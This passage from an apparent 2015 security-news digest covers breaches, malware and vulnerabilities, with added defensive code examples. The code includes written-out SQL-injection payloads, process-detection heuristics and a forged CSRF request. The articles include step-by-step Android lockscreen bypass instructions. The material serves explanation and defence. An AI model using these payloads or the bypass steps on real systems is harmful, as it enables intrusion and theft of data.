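    if (argv0.rstrip("/") or "/") in SYSTEM_DIRS:
        reasons.append("argv0-names-a-directory")  # argv[0] rewritten to look like a system path
    if argv0.startswith(SCRATCH_DIRS):
        reasons.append("runs-from-tmp")
    if "/." in argv0:
        reasons.append("hidden-directory")
    if argv0.startswith("./"):
        reasons.append("relative-executable")
    if DOWNLOAD_AND_RUN.search(proc.cmd):
        reasons.append("download-and-run")
    return reasons


def triage(text):
    """Map pid -> reasons for every process the heuristics flag."""
    flagged = {}
    for proc in parse_ps(text):
        reasons = suspicious_reasons(proc)
        if reasons:
            flagged[proc.pid] = reasons
    return flagged


if __name__ == "__main__":
    for pid, why in sorted(triage(SAMPLE_PS).items()):
        print(pid, ", ".join(why))
```

On the router itself the argv[0] trick can be seen through by comparing the command with /proc/PID/exe, which the kernel fills from the real executable; the argv[0] heuristic here stands in for that when all you have is a pasted ps listing.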

D-Link accidentally published private keys, making attackers' work easier

19.9.2015 Vulnerabilities
Milan Šurkala
D-Link has committed a serious security blunder. It left a number of its private keys in its firmware, thanks to which attackers could build firmware containing malware and digitally sign it without any trouble.
D-Link also provides open-source firmware for its devices, but the packages provided for the D-Link DCS-5020L security camera accidentally also contained private keys and passwords. This means an attacker could create firmware containing malicious code and, without much difficulty, have that tainted firmware digitally signed so that it appeared to be legitimate software from D-Link.
The problem affected only one package, since both older and newer versions did not contain these keys. The original certificates were created on 27 February, so attackers could have exploited the mistake as long as half a year ago. All of the accidentally published certificates had expired by 3 September at the latest. It is not yet known whether anyone used D-Link's leaked keys for malicious activity. Recall that signing malware with stolen certificates is a fairly popular and, above all, effective method; certificates stolen from Sony Pictures Entertainment, for example, were later used to sign malware.

Porn app secretly photographed users and then blackmailed them

19.9.2015 Mobile

Zscaler discovered an Android app that promised porn. Instead, it photographed the user and then demanded a ransom.
Adult Player lured users into installing it on Android devices with the promise of some pornographic pleasure and then took their pictures (using the front camera). The app then locked the phone and demanded $500.

It is essentially a classic example of ransomware, as this branch of malware is called: it first locks your device and then demands a ransom to unlock or decrypt it. Extortion apps exist for both conventional computers and mobile devices and can be very inventive. They quite often demand payment in bitcoin.

Naturally, you could not get Adult Player from the official Google Play store; you had to enable installation from other sources on the phone and obtain Adult Player elsewhere: download it as an APK from the internet (it may also arrive by e-mail) or find it in the flood of shady and fraudulent app stores.

Getting rid of something like this is usually possible by rebooting into Safe Mode, in which the phone starts without running the third-party apps installed on it, so the malicious one can usually be removed. It is not 100% effective, though; some of the "better" malicious apps can defend themselves well.

More details, including an inactive link, can be found in Zscaler's post More Adult Themed Android Ransomware.

Adult Player basically poses as a porn video player and, in the classic way, relies on users granting it device administrator rights, which it requests on first launch. That alone should be enough for a user to refuse, but unfortunately the well-known fact applies that people usually blindly click OK (in this case Activate).

After launching and compromising the phone, it finally locks the device and displays the classic notice that the FBI is after you, and demands payment. Restarting the phone does not remove the lock screen.

Can AVG sell our browsing history?

18.9.2015 Surveillance
Jan Vítek
AVG is a well-known antivirus maker whose products, according to the company's website, help protect the computers of 200 million active users. Now, though, a clause in its terms is under discussion according to which AVG can reportedly sell browsing history to third parties.
The report came from the site Computing, whose editor examined the provisions dealing with the privacy and personal data of AVG users. Many of them rely on the free version of the AVG antivirus, which is otherwise very popular and regularly receives positive ratings in various tests and reviews. The new provisions are to take effect on 15 October and, according to the source, will allow the "collection and sale of personal information relating to browsing history, searches, location (GPS) and metadata". Previously, the policy spoke only of collecting data about AVG applications and sites and about malicious software the antivirus finds on the computer.

Computing specifically takes issue with the section "What do you collect that cannot identify me?". It describes the collection of data that is labelled non-personal, i.e. data that cannot identify us. AVG will be able to sell such data to third parties, including:
the advertising ID associated with our device
browsing history, including searches and metadata
information about our internet service provider
information about other installed applications and how they are used

AVG also commits that browser data that could identify us will not leave the company. In another part of the terms, however, AVG writes that it will share "certain personal data" with its sister companies, search service providers and selected distributors and other partners. Alexander Hanff considers these terms completely unacceptable, since they are to apply to software that has extensive privileges in the system, its job being protection against malware. And there is the question of whether the new terms are even compatible with the forthcoming EU personal data protection legislation, the GDPR (General Data Protection Regulation).

AVG has already responded on its blog, where it published a sort of guide to how the new privacy and security provisions are to be understood. It published them a month in advance, it says, to get feedback from users, and stated that users will be able to choose whether or not they want to share their data, anonymously. This option will also be offered in some of AVG's free products, which may mean that in others data sharing could be mandatory. Finally, AVG states that it does not sell, and will not sell to anyone, any personal data that relates directly to us as individuals.

Leaky Androids: phones wait months for patches

18.9.2015 Mobile

It has been known for a long time, but everyone more or less acts as if it did not exist. Android security is far from ideal. The cause is manufacturers patching security bugs late, or rather the absence of a system that would make delivering patches easy. And so hundreds of millions of vulnerable Androids roam the world.

Fragmentation, the existence of many different versions, is often called Android's biggest problem. It is gradually being reduced, mainly because the basic concept of the system has settled and new versions no longer differ that much from one another. Then there is the problem that manufacturers delay releasing new Android versions for many months. And tied to that is an even more serious problem: users also have to wait many months for security patches.

If you do not have a Nexus device, or are not running one of the very current alternative ROMs, it is very likely that your phone is vulnerable to several very serious bugs. Recall that the number of active Android devices is estimated at well over a billion. Android therefore poses a greater security risk than, say, regularly updated desktop systems, which are discussed more often in this context.

The current state: months of waiting

Most manufacturers currently do not deal with security updates at all. Or rather, they collect them but patch the bugs only with the standard upgrade of the system to a new version. For new and popular devices that comes roughly three times a year. But if you have one of the less widespread phones, you may get an update barely once a year. In both cases the interval is insufficient and leaves phones and tablets exposed for several months.

It must be said that Google, too, did not pay the problem enough attention for a long time. It has been issuing regular security bulletins for a while, in which it alerts manufacturers to the more serious bugs, but otherwise it puts no pressure on manufacturers, even though it could. If manufacturers want Google's blessing, logo and service apps, they must meet its conditions. Those currently say nothing at all about security updates. And when there is no pressure from Google or from users, manufacturers treat updates very carelessly.

Google will lead by example

Even Google has begun to realise that the situation is serious. After all, leaky Androids are bad publicity not only for the manufacturers but for Google too. So far, though, Google has chosen only the mildest measure: it will lead by example. Every month it will release a package of security fixes based on the security bulletin it already compiles anyway. The updates arrive over-the-air (OTA) as usual. Users of supported Nexus devices (Nexus 4 and newer) have already received two such packages.

Google has already had at least partial success with this step, since two large manufacturers, Samsung and LG, have decided to follow it. The format should be the same: monthly. It is not yet clear when users will see the first updates, or which devices will get them. A side effect of releasing updates could thus be the setting of a support period for each smartphone. That is currently the exception; no plan exists, and one day the manufacturer simply says: you will not get the new Android.

Some recognition is also due to Motorola, which has not yet promised regular updates but at least released an out-of-band update fixing Stagefright, the most serious Android bug of recent times. Samsung did the same for its top models. But we must not be lulled by the fixing of one bug, however big. A number of serious bugs are found in Android every year. Without a change in the whole update policy, the situation will not improve.

TIP: You can test your device's vulnerability to Stagefright with a dedicated app.

Android needs a better update system

The problem is not only the manufacturers' willingness to patch but also the update system itself, which is fairly unfriendly. It requires rebooting the device and usually a long wait while Android "optimises apps". Depending on the number of installed apps, storage speed and computing power, this process can stretch to half an hour, during which the phone also drains its battery very quickly.

What does that mysterious optimisation mean? Android simply compiles the installed apps so that they launch as fast as possible. Recompilation is currently necessary even for small changes to the system. It is, incidentally, connected with the introduction of the ART runtime, which was optional in Android 4.4 and mandatory in Android 5.0 Lollipop. Until then apps were handled by Dalvik, which compiled them just in time at run time.

Asking the user to set aside half an hour a month for an update is quite a big demand. Especially when desktop systems, Windows 10 in particular, already install updates in the background almost without the user's knowledge or notice. Of course, updating the Linux kernel is one, relatively complex, matter, but updating smaller and relatively isolated components of the system could be easier. Unfortunately, today's Android architecture does not offer many options.

Change is inevitable

A faster update system is, however, a secondary matter. The main thing is for manufacturers to actually start releasing updates regularly. The security of mobile devices really should not be underestimated. You may not even realise it, but over the past few years smartphones and tablets have become the devices that often have the greatest access to users' personal data. Often more than personal computers.

If it cannot be done the nice way, Google should try the hard way: by amending the terms under which manufacturers may use its services. Google is fairly well known for caring about security and trying to fix bugs quickly. Its bug bounty programmes, which offer bug finders handsome rewards, are after all among the most successful anywhere. If so many leaky devices bearing Google's logo are roaming the world, it rather spoils its reputation. Let us hope the future of Android will be rosy. And considerably more secure.

How to hide from surveillance cameras: the past and the future

Surveillance cameras are everywhere today: outdoors and indoors, at airports, railroad stations, offices, and shops. You cannot escape the all-seeing eye of the cameras even in the wild, making George Orwell’s refined imagination blanch in the face of reality.

Kaspersky Lab tells how to hide from surveillance cameras

For most monitoring systems, video is recorded on a loop "just in case" and goes no further. Lately, though, it has become more common for this video to be fed to various data analysis systems, so it can be used to track specific people.

It goes without saying that Big Brother may intrude on our private lives. You might accept that from the government, whose people are at least nominally there to maintain order. Yet today ordinary businesses are trying to use biometric systems against our wallets and our right to a private life. And that is a horse of a different color.

For example, you are shopping for a winter coat. At the same time, the surveillance system of the store checks you with the pictures of known robbers and adds one more record into your buyer profile.

Alternatively, you go to a car dealer to take a look at new cars. The moment you walk in, the dealer learns your name and everything there is to know about you. Including the fact that you cannot afford a new car.

There is no salvation even inside churches. Facial recognition systems are already used to discover regular church-goers: it turns out that it is more promising to solicit donations from them.

Isn’t it nice? Not so much, but there is nothing criminal about this.

What will you say if every detail of your private life, collected by different companies, comes to light one day on the Internet? Unlike the Ashley Madison hack, there will be no doubt that it is you: here are your pictures and videos to prove it.

The laws of most countries still do not truly suppress the usage of facial recognition for commercial purposes, just as it is not forbidden, for example, to take pictures of people in the streets. It does not come as a surprise that more and more people are wondering how to hide from the all-seeing eye in these conditions.

To understand how best to do that, a few words are needed about contemporary image analysis methods. Broadly speaking, there are two common approaches.

May I see your face please
The first approach is based on comparing markers that can be extracted from a picture against a prebuilt database. The markers can be the distance between the eyes, nose measurements, lip shape evaluations, and so on.

This approach is similar to identifying a person by fingerprints. Sample prints must be taken beforehand and saved in a database; afterwards, the papillary lines of an unknown person are compared against the samples to see how closely they match. The prerequisite for facial recognition is therefore adequate-quality pictures (full-face, with good, even lighting) of the right people.

Where can these pictures be obtained? The sources vary. Perhaps you are asked to look into a camera when a discount card is issued, or someone scans a document bearing your photo.

It is relatively easy to fool a classic facial recognition system. The easiest way is to lower your head and not look into the camera. Most markers can only be measured from a roughly full-face angle, so a picture taken at an angle will most likely not provide the required data. If you wear a peaked cap, cameras mounted above you (they are usually installed fairly high) become completely useless.

Some experts advise pulling faces as you pass a lens. It may work well enough, but it attracts too much attention. A pair of dark glasses is what you need.

The advantage of sunglasses is that they cover the eyes, one of the most useful areas of the face for recognition systems. Ordinary clear prescription glasses do not distort the required details much, and advanced algorithms cope with them easily. Large opaque glasses, however, are a serious challenge for classic systems, as are mirrored models that blind the camera with reflected light.

And the way you look tonight…
The second approach to recognizing people, actively developed by Facebook and Google among others, works differently. It is based on machine learning algorithms that automatically gather sample data and compare it against every available online source.

This is far more flexible and much harder to trick. Even a gas mask over your face does not guarantee anonymity, because such systems do not depend on a fixed set of markers.

They can use any available data for recognition: the shape of your legs or your bald patch, a tattoo, your posture, your clothes, and so on. An experimental Facebook system can identify a person from any angle with 83% accuracy, given enough sample pictures.

The key is a sufficient number of pictures to compare against. If the other end holds only one image of you, even a high-quality one, the chance of successful recognition plummets. This is why Big Data technologies and fast Internet search algorithms come to the fore.

How to hide from #surveillance cameras: the past and the future
Here is the sore point: should we openly publish pictures of ourselves online? We may accept that Facebook or Google uses them for its own marketing, since there is no hiding from these "Big Internet Brothers" anyway. Yet nothing stops any other company from mining that data if it is freely accessible.

Suppose your Facebook page is locked down with the "Friends Only" privacy setting. What about stray pictures of you in other people's posts? What about your LinkedIn profile? Cutting off all the sources is very hard, even with complete social-network abstinence.

The solution is not yet clear. Most likely it will be a mix of stricter government regulation of the biometrics market and a more conscious attitude in society.

So it is time to get used to the idea that our personal pictures are almost as private as scans of our documents or credit cards. Flaunting them everywhere is not recommended.

Researchers make easy work of Android lockscreen security

Lockscreen security on Android smartphones can be bypassed by an attacker holding the device, even when the device is encrypted, it has been revealed.
Researchers from the University of Texas at Austin discovered a vulnerability in Android 5.x (CVE-2015-3860) that lets an attacker circumvent the lockscreen and take control of the smartphone.
“By manipulating a sufficiently large string in the password field when the camera app is active an attacker is able to destabilize the lockscreen, causing it to crash to the home screen,” the team reported in an official blog.
“At this point arbitrary applications can be run or adb developer access can be enabled to gain full access to the device and expose any data contained therein.”
Two conditions must hold for the attack to work: the attacker must have physical access to the device, and the owner must be using a password (as opposed to a PIN or pattern) as the lock.
The process of bypassing security
From the locked screen, the attacker will open the emergency call window, “type a few characters”, double-tap to highlight the text and then copy.
“[The cybercriminal will] then tap once into the field and tap paste, doubling the characters in the field,” the researchers elaborated.
This process is then repeated until the attacker can no longer highlight the field with the double-tap (approximately 11 repetitions).
From there, the attacker returns to the lockscreen and opens the camera, which is reachable without unlocking the phone.
The next step is to swipe down to bring up the notification shade, press the settings icon and, when the password prompt appears, long-tap into the field.
As before, the attacker pastes the copied characters into the field as many times as the device will allow.
This ends when the user interface crashes and the "soft buttons of the screen disappear". The camera then expands to full screen and the attacker waits for it to crash as well (a degree of patience is required).
The attacker can then "navigate to the settings application by any means possible" and, "at this point, it is possible to enable USB debugging normally and access the device via the adb tool to issue arbitrary commands".
The vulnerability has been resolved
The university reported the flaw to the Android security team towards the end of June. Google committed a patch in August and, on September 9, announced that Android 5.1.1 build LMY48M fixes the issue.
In the announcement, Google stated that it had not observed any malicious exploitation of the kind described by the University of Texas at Austin.
Aggressive Android ransomware spreading in the US
In related news, ESET recently reported that it had found the “first known Android lock-screen-type ransomware spreading in the wild that sets the phone’s PIN lock”.
Lukas Stefanko, a malware researcher at ESET, noted that this development is significant and that “malware writers have stepped up their game”.
He explained: “With the new Android ransom-lockers … users have no effective way of regaining access to their device without root privileges or without some other form of security management solution installed, apart from a factory reset that would also delete all their data.”

The Trojan Games: Odlanor malware cheats at poker

Whenever ESET malware researchers discover a new interesting attack, a new piece of malware, or an old threat evolving in an interesting way, we share the news on this blog. Every once in a while, though, we stumble upon something that stands out, something that doesn’t fall into the “common” malware categories that we encounter every day – such as ransomware, banking trojans, or targeted attacks (APTs) – just to name a few of those that are currently causing the most problems. Today, we’re bringing you one of those uncommon threats – a trojan devised to target players of online poker.
The last time I wrote about poker-related malware, it was about PokerAgent, a trojan propagating through Facebook that was used to steal Facebook users’ logon credentials, credit card information and the level of Zynga poker credit.
Today, we’re bringing you news about Win32/Spy.Odlanor, which is used by its malware operator to cheat in online poker by peeking at the cards of infected opponents. It specifically targets two of the largest online poker sites: PokerStars and Full Tilt Poker.
Modus operandi: Malware takes screenshots of the infected opponent

The attacker seems to operate in a simple manner: After the victim has successfully been infected with the trojan, the perpetrator will attempt to join the table where the victim is playing, thereby having an unfair advantage by being able to see the cards in their hand.
Let’s explain each of those steps in a bit more detail, as uncovered through our analysis.
Like a typical trojan, Win32/Spy.Odlanor usually reaches victims unknowingly, bundled with some other, useful application downloaded from sources other than the software authors' official websites. The malware masquerades as benign installers for general-purpose programs such as Daemon Tools or µTorrent. In other cases it was loaded onto the victim's system through various poker-related programs (poker player databases, poker calculators and the like) such as Tournament Shark, Poker Calculator Pro, Smart Buddy, Poker Office and others.
Once executed, the Odlanor malware will be used to create screenshots of the window of the two targeted poker clients – PokerStars or Full Tilt Poker, if the victim is running either of them. The screenshots are then sent to the attacker’s remote computer.
Afterwards, the screenshots can be retrieved by the cheating attacker. They reveal not only the hands of the infected opponent but also the player ID. Both of the targeted poker sites allow searching for players by their player IDs, hence the attacker can easily connect to the tables on which they’re playing.
We are unsure whether the perpetrator plays the games manually or in some automated way.
In newer versions of the malware, general-purpose data-stealing functionality was added by running a copy of NirSoft WebBrowserPassView embedded in the Odlanor trojan. This tool, detected by ESET as Win32/PSWTool.WebBrowserPassView.B, is a legitimate, albeit potentially unsafe, application capable of extracting passwords from various web browsers.
Communication with its C&C via HTTP

The trojan communicates with its C&C, the address of which is hardcoded in the binary, via HTTP. Part of the exfiltrated information, such as the malware version and information identifying the computer, are sent in the URL parameters. The rest of the collected information, including an archive with any screenshots or stolen passwords, is sent in the POST request data.
The screenshots from IDA Pro below show the parts of the malware code that search for PokerStars and Full Tilt Poker windows:


We have observed several versions of the malware in the wild, the earliest from March 2015. According to ESET LiveGrid® telemetry, the largest number of detections comes from Eastern European countries; several of the victims were located in the Czech Republic, Poland and Hungary. Nevertheless, the trojan poses a potential threat to any online poker player. As of September 16th, several hundred users had been infected with Win32/Spy.Odlanor.
SHA1 hashes



iOS AirDrop vulnerability allows for malware installation on Apple devices

In addition to the usual benefits that come with an updated operating system – new enhancements that make your device easier to use – there are other, less visible advantages to downloading the latest software.
Security is one of these, and, as Apple launches iOS 9, this understated benefit has been highlighted by an expert who has come across a flaw.
Mark Dowd, director and founder of Azimuth Security, explained to Forbes that any iOS device that supports the AirDrop feature is vulnerable to a certain type of cyberattack.
This applies to every Apple device that supports AirDrop, which means iPhones and iPads running iOS 7 or later as well as recent Macs, Mr Dowd noted.
He showed that via AirDrop – which allows individuals to share photos, videos, websites and locations with other Apple devices – an attacker can install malware on a victim’s smartphone or tablet.
This is achieved through a directory traversal attack: the AirDrop receiver can be tricked into writing the transferred file outside the directory it is supposed to use, into parts of the filesystem that should be off-limits to an unauthenticated sender.
With that write primitive the attacker can alter configuration files, so the device will install malicious apps that appear to have been authorized through Apple's Developer Enterprise Program.
“To make the iPhone accept his certificate, Mr Dowd’s AirDrop attack forced an installation of a provisioning profile for his app,” the online news provider detailed.
“He then altered Springboard, Apple’s tool for managing the iOS home screen, to trick the phone into believing his ’enterprise’ was already accepted as trusted by the user when it shouldn’t have been.
“He then copied his malware files into the directory where third-party apps were located.”
Mr Dowd has advised users to upgrade their Apple devices immediately to avoid falling victim to this attack.
Last week, at Apple’s Keynote event in San Francisco, it was revealed that iOS 9 comes with additional security features.
There are two notable developments – a stronger passcode and a revamped two-factor authentication process (2FA).
"By building [2FA] directly into iOS, it [is] harder for others to gain unauthorized access to your Apple ID," the tech giant stated at the time.

Second Russian pleads guilty in record US data breach

A second Russian man has pleaded guilty in an American court for his role in what is thought to be the biggest data breach in the history of the US.
A day after 34-year-old Vladimir Drinkman pleaded guilty in New Jersey for helping orchestrate the theft of 160 million credit card details, Dmitriy Smilianets, 32, admitted his involvement in the cyberattack.
The two men, along with three others, were originally indicted in 2013 and charged with “spearheading a worldwide hacking conspiracy that victimized a wide array of consumers and entities, causing hundreds of millions of dollars in losses”.
Mr Drinkman and Mr Smilianets were first apprehended in the Netherlands three years ago. The latter was extradited to the US at the time, while the former had been in the custody of Dutch authorities until February of this year.
The other three suspects in this landmark case, Alexandr Kalinin, 28; Roman Kotov, 34; and Mikhail Rytikov, 28, remain at large.
Prosecutors argue that all five suspects “conspired with others” to breach computer networks belonging to payment processing companies, retailers and financial institutions – including Nasdaq, 7-Eleven, Carrefour, JCP, Hannaford and Ingenicard.
"The initial entry was often gained using a SQL (structured query language) injection attack," the Department of Justice explained earlier this year.
“The hackers identified vulnerabilities in SQL databases and used those vulnerabilities to infiltrate a computer network.”
Once in, the defendants were able to circulate malware throughout the system, creating a hidden "backdoor" that allowed them to maintain ongoing access to the network.
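The entry vector above is a SQL injection: user input is pasted into the text of a query, so the input can change the query's structure. As an added example, not part of the DOJ's description of the case, here is the vulnerable form beside the parameterized one, run against a constructed SQLite table. The two payloads show the classic tautology that returns every row and a UNION that reads the schema, which is how an attacker maps a database once an injection point is found.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for a payment processor's customer table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, card_last4 TEXT)")
    conn.executemany("INSERT INTO customers (email, card_last4) VALUES (?, ?)",
                     [("alice@example.com", "4242"), ("bob@example.com", "1111")])
    return conn

def lookup_vulnerable(conn, email):
    # The user-supplied value is spliced into the statement text, so a quote
    # character in it ends the literal and the rest is parsed as SQL.
    sql = "SELECT email, card_last4 FROM customers WHERE email = '%s'" % email
    return conn.execute(sql).fetchall()

def lookup_safe(conn, email):
    # Bound parameter: the value is sent separately and never parsed as SQL,
    # so the same payloads are just strings that match no row.
    return conn.execute("SELECT email, card_last4 FROM customers WHERE email = ?",
                        (email,)).fetchall()

# Constructed payloads of the kind the vulnerable function accepts.
DUMP_ALL = "' OR '1'='1"                                    # every row
ENUM_SCHEMA = "' UNION SELECT name, sql FROM sqlite_master --"  # table definitions
```

The UNION payload works because the injected SELECT returns the same number of columns as the original query; against a real engine the attacker would read the catalog tables of that engine instead of sqlite_master.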
After they had acquired credit card data – and valuable information connected to it – they went on to sell the information to individuals and organizations throughout the world.
It is alleged that for every American credit card number and associated data, the group made a $10 profit; for Canadian counterparts, it was $15; and for European alternatives, it was $50.
“This hacking ring’s widespread attacks on American companies caused serious harm and more than $300 million in losses to people and businesses in the United States,” commented Leslie R. Caldwell, assistant attorney general for the criminal division of the Department of Justice.
“As demonstrated by today’s conviction, our close cooperation with our international partners makes it more likely every day that we will find and bring to justice cybercriminals who attack America – wherever in the world they may be.”

New Bug in Bugzilla Software Could Expose Zero-Day Vulnerabilities

A critical vulnerability discovered in Mozilla's popular Bugzilla bug-tracking software, used by hundreds of thousands of software organizations, could expose details of their non-public security vulnerabilities to hackers.
So it’s time for developers and organizations that use Bugzilla open source bug tracking system to upgrade to the latest patched versions – namely 5.0.1, 4.4.10, or 4.2.15.
Bugzilla is a bug-tracking database used by Mozilla as well as many open-source projects and private organizations. Besides patched flaws, such databases also hold sensitive details of unpatched vulnerabilities that have been reported to the organization but not yet fixed.
Unfortunately, the researchers at security firm PerimeterX have discovered a vulnerability (CVE-2015-4499) in Bugzilla's email-based permissions process that allowed them to gain high-level permissions on Bugzilla.
As a result, it is potentially possible for an attacker to easily access unpatched bugs in your database, which could then be exploited to attack affected pieces of software on people's computers before security patches are released.
So, anyone who uses Bugzilla and its email-based permissions is affected, including popular free software projects such as Apache Project, LibreOffice and Red Hat.
Incredibly Easy to Exploit
According to the researchers, the vulnerability is "incredibly easy to exploit": all an attacker needs to do is register a regular account via email and trick the system into treating that account as belonging to a privileged domain, at which point Bugzilla grants the permissions reserved for that domain.
"The implications of this vulnerability are severe," PerimeterX's security researcher Netanel Rubin wrote in a blog post. "It could allow an attacker to access undisclosed security vulnerabilities in hundreds of products… Imagine the hundreds or thousands of zero-days and other security vulnerabilities that could potentially be exposed."
Rubin said the flaw was tested against Mozilla's own Bugzilla instance, and that all Perl-based Bugzilla versions from 2.0 to 4.2.14, 4.3.1 to 4.4.9 and 4.5.1 to 5.0 were vulnerable at the time of the report.
It's not clear whether the Bugzilla vulnerability has been used by malicious hackers to gain access to more unpatched vulnerabilities.

Researchers to Develop Long-Lasting Solid-State Batteries

Whenever you buy an electronic gadget (phone, tablet, laptop, watch), the most important specification is not its processor speed or camera quality but how long its battery lasts.
Imagine easy access to such batteries that provide more battery power after charging it once, do not give up in less time and have a life of many years.
To achieve this, the researchers at Massachusetts Institute of Technology (MIT) and Samsung, have developed a new material that could potentially revolutionize the Battery industry.
Their approach is to replace the liquid electrolyte used in today's cells with a solid one: a solid-state electrolyte.
Solid-State Electrolytes could simultaneously address the greatest challenges associated with improving lithium-ion batteries (LIB), with the possibility to increase storage, battery life, and the safety of batteries.
The researchers identified solid materials that can conduct ions fast enough to be useful in a battery. Their work focuses on:
the development of materials for clean energy;
batteries that last for an indefinite period;
the safety problems that current batteries pose for many users.
"The electrolyte in such batteries, typically a liquid organic solvent whose function is to transport charged particles from one of a battery's two electrodes to the other during charging and discharging, has been responsible for the overheating and fires that, for example, resulted in a temporary grounding of all of Boeing's 787 Dreamliner jets," one of the researchers explains.
Batteries with a solid electrolyte are also safer, since the flammable liquid electrolyte is the main reason batteries catch fire.
"The initial findings focused on a class of materials known as superionic lithium-ion conductors, which are compounds of lithium, germanium, phosphorus, and sulfur, but the principles derived from this research could lead to even more effective materials" the team says.
Be it a laptop, electric car, camera or a cell phone, Li-ion battery is found in every product as they give an advantage of recharging the same battery instead of replacement.
“With a solid-state electrolyte, there’s virtually no degradation reactions left” — meaning such batteries could last through “hundreds of thousands of cycles.”
To know more, visit the official MIT newsroom.
In the past, many other researchers have attempted to find a solid replacement for the liquid electrolyte, but this group is the first to show that this can be done in a formulation that fully meets the needs of battery applications.
The research will result in the making of a “Power Packed” battery.
Moreover, with the same goal of extending battery life, Apple reportedly plans to build fuel cells capable of powering an Apple device for many days without a recharge.

Beware Coffee Lovers! StarBucks Exposed you to 3 Critical Vulnerabilities

Ever registered on the Starbucks website? Change your password now!
If you are one of the millions of Starbucks customers who registered an account and credit card details on the Starbucks website, your payment details were exposed to hackers.
An Independent Security Researcher, Mohamed M. Fouad from Egypt, has found three critical vulnerabilities on StarBucks website that could have allowed attackers to take over your account in just one click.
The vulnerabilities include:
Remote Code Execution
Remote File Inclusion leading to phishing attacks
CSRF (Cross-Site Request Forgery)
Theft of credit card details (a consequence of the above)
With a Remote File Inclusion flaw, an attacker can make the target page include a file from any location; the server parses and executes that file as source code, allowing the attacker to perform:
Remote Code Execution on the company's web server
Remote Code Execution on the client side, potentially enabling other attacks such as Cross-Site Scripting (XSS)
Data theft or manipulation via phishing, in an attempt to hijack customer accounts that hold credit card details
Hijacking Starbucks Store Account Using CSRF
CSRF, or Cross-Site Request Forgery, is an attack in which an intruder makes a site act as if a legitimate user had sent the request. All the attacker needs is to get the victim's browser to make a request to the site on their behalf, which works if they can either:
Convince users to click on their HTML page
Insert arbitrary HTML in a target site
In this case, an attacker can use CSRF to trick a victim into clicking a URL that changes user's store account information including account password.
This could allow the attacker to hijack victims' accounts, delete accounts or change victims' email addresses.
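As an added example (not Fouad's proof of concept and not Starbucks' code), here is a minimal model of an account-settings endpoint of the kind described above, first as it behaves when it trusts the session cookie alone, then hardened with a per-session synchronizer token and an Origin check. The site name, session store and account records are stand-ins constructed for the example.

```python
import hashlib
import hmac
import secrets

SITE_ORIGIN = "https://store.example"      # hypothetical site, not the real one
SECRET = secrets.token_bytes(32)           # server-side key that binds tokens to sessions
SESSIONS = {}                              # session id -> username (stand-in session store)
ACCOUNTS = {"alice": {"email": "alice@example.com"}}

def login(username):
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = username
    return sid

def csrf_token(session_id):
    # Synchronizer token: an HMAC over the session id that the server renders
    # into its own forms. A page on another origin cannot read it.
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def change_email_vulnerable(cookies, form, headers):
    # Authorizes on the session cookie alone. The browser attaches that cookie
    # to a form POST no matter which page submitted it, so a forged request passes.
    user = SESSIONS.get(cookies.get("session"))
    if user is None:
        return 401
    ACCOUNTS[user]["email"] = form["email"]
    return 200

def change_email_hardened(cookies, form, headers):
    sid = cookies.get("session")
    user = SESSIONS.get(sid)
    if user is None:
        return 401
    # Check 1: the submitted token must match the one tied to this session.
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token(sid)):
        return 403
    # Check 2: browsers send Origin on cross-site POSTs; reject foreign ones.
    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403
    ACCOUNTS[user]["email"] = form["email"]
    return 200

def simulate_forged_post(handler):
    """Victim is logged in; an attacker page auto-submits a form to the endpoint."""
    ACCOUNTS["alice"]["email"] = "alice@example.com"
    sid = login("alice")
    cookies = {"session": sid}                          # attached by the browser
    form = {"email": "attacker@evil.example"}            # no csrf_token field
    headers = {"Origin": "https://evil.example"}         # set by the browser, not the attacker
    return handler(cookies, form, headers), ACCOUNTS["alice"]["email"]

def simulate_legit_post(handler):
    """The same change made from the site's own form, which carries the token."""
    ACCOUNTS["alice"]["email"] = "alice@example.com"
    sid = login("alice")
    form = {"email": "alice@new.example", "csrf_token": csrf_token(sid)}
    return handler({"session": sid}, form, {"Origin": SITE_ORIGIN}), ACCOUNTS["alice"]["email"]
```

The Origin check is kept as a second layer because the token alone does not help if the token is leaked through an XSS bug on the site; the two checks fail independently.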
Video Demonstration
Fouad also published a video demonstration as a proof of concept showing the attack in action.

Fouad reported the critical flaws to Starbucks twice, in white-hat fashion, but received no reply from the team.
He then reported the same flaws to US-CERT, which confirmed the vulnerabilities; Starbucks fixed them roughly ten days ago.
Fouad is still waiting for a reply and for a bug bounty from Starbucks, which launched its bug bounty program just two months ago.

Bugzilla CVE-2015-4499 flaw, be aware hackers could know all your bugs

A critical vulnerability in Mozilla's Bugzilla bug-tracking software could be exploited to access details of non-public vulnerabilities stored in its database.
The open source Bugzilla bug-tracking system is used by hundreds of thousands of software organizations to track bugs discovered in their applications.

The development team urges users to upgrade to the fixed releases of Bugzilla, namely 5.0.1, 4.4.10 or 4.2.15.

The bug is considered critical because of the sensitive data such a system manages: a breach could expose information on non-public vulnerabilities to hackers, who could then use it in attacks.

The experts at PerimeterX, the security firm that disclosed the vulnerability (CVE-2015-4499), explained that the flaw resides in Bugzilla's email-based permissions process and could allow an attacker to gain high-level permissions on a Bugzilla installation.
“The implications of this vulnerability are severe – it could allow an attacker to access undisclosed security vulnerabilities in hundreds of products, in a manner similar to the Mozilla major data leak in August this year, only multiplied by the thousands of publicly available Bugzilla deployments. Imagine the hundreds or thousands of zero-days and other security vulnerabilities that could potentially be exposed!”
An attacker can easily breach an unpatched Bugzilla database. Among the well-known organizations that use the bug tracker are the Apache Project, Red Hat and LibreOffice.
The researchers explained that the vulnerability is "extremely easy to exploit": the attacker just needs to register a regular account via email and trick the system into believing the account belongs to a privileged domain, which grants it that domain's permissions.

"If you are using email based permissions in your Bugzilla deployment and have not yet installed a patched version, take it down until patched. Make sure to go over the logs and user-list to identify users that were created using this vulnerability. This vulnerability is extremely easy to exploit and the details have been known for more than a week, you have been or will be attacked!" explained the PerimeterX researchers.
The researchers tested the flaw against Mozilla's own Bugzilla instance and found that all Perl-based Bugzilla versions from 2.0 to 4.2.14, 4.3.1 to 4.4.9 and 4.5.1 to 5.0 were vulnerable.

